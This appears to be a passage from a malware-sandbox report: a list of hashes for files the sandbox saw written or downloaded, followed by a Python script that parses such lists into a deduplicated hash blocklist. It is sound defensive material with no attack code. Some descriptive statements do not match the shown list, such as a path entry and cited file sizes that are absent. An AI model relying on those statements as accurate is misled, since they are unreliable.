  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 131KB
  MD5: bd65d387482def1fe00b50406f731763
  SHA1: d06a2ba2e29228f443f97d1dd3a8da5dd7df5903
  SHA256: 1ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997
  SHA512: 351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9
- Filesize: 726KB
  MD5: 5f14117f1fd87fa46fb37b56e87f0e7f
  SHA1: 50a2950aaad34258933cf10f78195b61f870ee7d
  SHA256: e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae
  SHA512: 1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0
- Filesize: 1KB
  MD5: 2c3304ee8796a40d7d606d4d635b1050
  SHA1: 98b05c86a9d87912951847e5e5235613226bb9fc
  SHA256: 8fcc05008500b2398401cc7c30470a3e717433fcf185083411ec691871734921
  SHA512: aab4e92bb8f19b3c4d4ee244a88596bbc3ed946ab6d8e36bfae22778f01a0c3518cfedebc8220b1d9a41c38f390024a6b688b7394d64d0f682b98a0c0a097018
- Filesize: 115B
  MD5: da50c767899e89be2747b807d950b672
  SHA1: d7495afae53905b5c680f23340ad8f9a8101cda9
  SHA256: 27e32b40ca044aee97ae9fa954bba97d3d81d27dead54917426d72826e7af476
  SHA512: b5d7133fc8216a8a0de9d370f49255df75c0f62b276775791d57d6473e521aaa3ed88280a52078ee8aeaa31727d677166fa1dcfd3ac8062775f613061d0badaf
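Each entry above is a file the sandbox saw written or downloaded, given as a size and four digests; only one entry carries a path. When the list is copied out as text the label fuses onto the digest ("SHA1" followed by "6f54…" becomes "SHA16f54…"), so splitting on "SHA" plus digits is unreliable: the digest's own leading digits are indistinguishable from the label. The script below is an added example and not tria.ge code. It recovers the records from either the fused or a "label: value" layout, accepts a digest only when its length matches the label (32, 40, 64 or 128 hex characters), reports entries that are missing a digest, and emits a deduplicated hash list suitable for a blocklist or a retro-hunt. The sample input is a constructed subset of this list (three entries, the last deliberately missing its SHA512); the report does not say what these files are and this example does not guess.

```python
"""Turn the flattened 'Downloads' list of a tria.ge report into checked hash
indicators. Added example; not tria.ge code."""
import re
from typing import Dict, List, Optional, Tuple

# Digest labels with the hex length each must have. Longest label first so the
# prefix test is unambiguous; the length check catches truncated digests.
DIGESTS = (("SHA512", 128), ("SHA256", 64), ("SHA1", 40), ("MD5", 32))
HEX = re.compile(r"^[0-9a-f]+$")
WIN_PATH = re.compile(r"^[A-Za-z]:\\")

# Constructed subset of the list above: fused labels, a path line, a
# "label: value" entry, and one entry with no SHA512 (deliberate).
SAMPLE = r'''
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize888B
MD5754cbf857ff0d8793d8d580ba21fdca1
SHA120f2c5ad4fbc117e775205f7ce1c1bae0e826b74
SHA2561c74005bd8f8d542b50c97d0d255bfdc7e88d7226a08bdd7871efe078df5483f
SHA51280fb0f4baba192507a3ced2bc8b2d70874adbaadadfbf0016d220c2194836151672a40e00ae21338e5e3bf4539199e0ec5476a6bcce563e465ad73134a647cb6
-
- Filesize: 115B
  MD5: da50c767899e89be2747b807d950b672
  SHA1: d7495afae53905b5c680f23340ad8f9a8101cda9
  SHA256: 27e32b40ca044aee97ae9fa954bba97d3d81d27dead54917426d72826e7af476
'''


def parse_digest_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (label, digest) for 'MD5df47…' or 'MD5: df47…'; None if the
    label is unknown or the digest is not hex of the length that label needs."""
    for label, length in DIGESTS:
        if line.startswith(label):
            value = line[len(label):].lstrip(": ").lower()
            if len(value) == length and HEX.match(value):
                return label, value
    return None


def parse_downloads(text: str) -> List[Dict[str, str]]:
    """A record starts at a 'Filesize' line (size fused, after ': ', or on the
    next line). A Windows path line directly before it names the file."""
    lines = [l.strip() for l in text.splitlines()]
    lines = [l[2:] if l.startswith("- ") else l for l in lines]   # drop bullets
    records: List[Dict[str, str]] = []
    cur: Optional[Dict[str, str]] = None
    path: Optional[str] = None
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("Filesize"):
            size = line[len("Filesize"):].lstrip(": ")
            if not size and i + 1 < len(lines):
                i += 1
                size = lines[i]
            cur = {"size": size, "path": path or ""}
            path = None
            records.append(cur)
        elif WIN_PATH.match(line):
            path = line
        elif cur is not None:
            d = parse_digest_line(line)
            if d:
                cur[d[0]] = d[1]
        i += 1
    return records


def incomplete(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Records missing any of the four digests (truncated copy, bad extraction)."""
    return [r for r in records if any(k not in r for k, _ in DIGESTS)]


def unique_by_sha256(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Deduplicate on SHA256 so the same artefact dropped twice is one indicator."""
    seen: Dict[str, Dict[str, str]] = {}
    for r in records:
        h = r.get("SHA256")
        if h and h not in seen:
            seen[h] = r
    return list(seen.values())


def to_csv(records: List[Dict[str, str]]) -> List[str]:
    """One line per unique record: sha256,md5,sha1,size,path (SHA512 left out for width)."""
    rows = ["sha256,md5,sha1,size,path"]
    for r in unique_by_sha256(records):
        rows.append(",".join([r["SHA256"], r.get("MD5", ""), r.get("SHA1", ""), r["size"], r["path"]]))
    return rows


if __name__ == "__main__":
    recs = parse_downloads(SAMPLE)
    print("\n".join(to_csv(recs)))
    for r in incomplete(recs):
        print("incomplete record:", r["size"], r["path"] or "(no path)")
```

The length check is what makes the fused form safe to parse: a SHA1 line that has lost its last character is rejected rather than silently stored as a 39-character indicator that will never match anything. Sizes are kept as the page gives them ("1024KB", "152B") because the report rounds them; they are not reliable enough to key a match on.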